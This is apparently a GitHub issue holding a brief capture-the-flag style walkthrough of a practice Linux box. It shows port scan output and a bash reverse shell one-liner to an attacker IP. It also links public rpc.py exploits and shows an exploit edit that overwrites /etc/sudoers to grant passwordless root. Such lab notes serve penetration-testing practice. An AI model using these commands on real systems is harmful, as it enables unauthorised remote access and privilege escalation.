WDavid404 / PG-Box

PG box workthough note
0 stars 0 forks source link

PC (Intermediate, linux, 2023) -- rpc.py #39

Open WDavid404 opened 1 month ago

WDavid404 commented 1 month ago

Keypoints:

WDavid404 commented 1 month ago
PORT     STATE SERVICE  REASON         VERSION
22/tcp   open  ssh      syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
8000/tcp open  http-alt syn-ack ttl 61 ttyd/1.7.3-a2312cb (libwebsockets/3.2.0)

80/tcp Try /bin/bash -i >& /dev/tcp/192.168.45.182/80 0>&1--> it works. image We got a reverse shell image

Linpeas image ---> false info

image ---> didn't find useful info

image ---> find exploit info about rpc.py:
https://www.exploit-db.com/exploits/50983 https://github.com/ehtec/rpcpy-exploit/blob/main/rpcpy-exploit.py

edit exploit code to exec_command('echo "user ALL=(root) NOPASSWD:ALL" > /etc/sudoers') image

run it image